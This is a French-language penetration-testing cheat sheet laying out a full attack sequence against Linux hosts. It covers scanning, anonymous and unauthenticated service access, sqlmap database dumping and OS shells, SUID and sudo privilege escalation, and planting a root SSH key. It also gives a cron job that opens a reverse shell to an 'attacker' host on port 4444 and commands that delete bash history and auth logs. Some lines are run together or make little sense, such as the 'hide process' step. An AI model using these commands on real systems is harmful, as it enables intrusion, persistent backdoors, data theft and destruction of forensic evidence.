Méthodologie complète pour tester la sécurité d'une infrastructure Linux.
Identifier les services réseau, ports ouverts et versions.
# Scan SYN complet
nmap -sV -sC -A -p- target
# Scan UDP
nmap -sU -p 53,123,161,162 target
# Scan de services spécifiques
nmap -p 22,80,443,3306,5432 -sV target
# SSH enumération
ssh-audit target
sshpass -p password ssh user@target
# FTP enumération
ftp target
(login: anonymous)
# MySQL sans authentification
mysql -h target -u root
# Redis enumerate
redis-cli -h target KEYS *
# Test basique
sqlmap -u "http://target/page?id=1" --dbs
# Dump utilisateurs
sqlmap -u "http://target/?id=1" -D database -T users --dump
# Shell système
sqlmap -u "http://target/?id=1" --os-shell
# Chercher binaires SUID
find / -perm -4000 2>/dev/null
# Vérifier sudo permissions
sudo -l
# Exploiter SUDO
sudo /usr/bin/script
# Exploit kernel
Searchsploit Linux 4.4
uname -a
# Ajouter clé SSH
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
# Cron backdoor
crontab -e
* * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1
# Hider processus
echo "bash" >> /root/.bash_profile
rm ~/.bash_historyrm /var/log/auth.log| Phase | Outils | Commandes clés |
|---|---|---|
| Reconnaissance | nmap, masscan, nikto | nmap -sV -A -p- target |
| Enumération | ssh-audit, redis-cli, mysql | redis-cli -h target KEYS * |
| Exploitation | sqlmap, metasploit, curl | sqlmap -u "url" --dbs |
| Escalade | linpeas, searchsploit | find / -perm -4000 2>/dev/null |
| Persistence | ssh-keygen, cron | crontab -e (reverse shell) |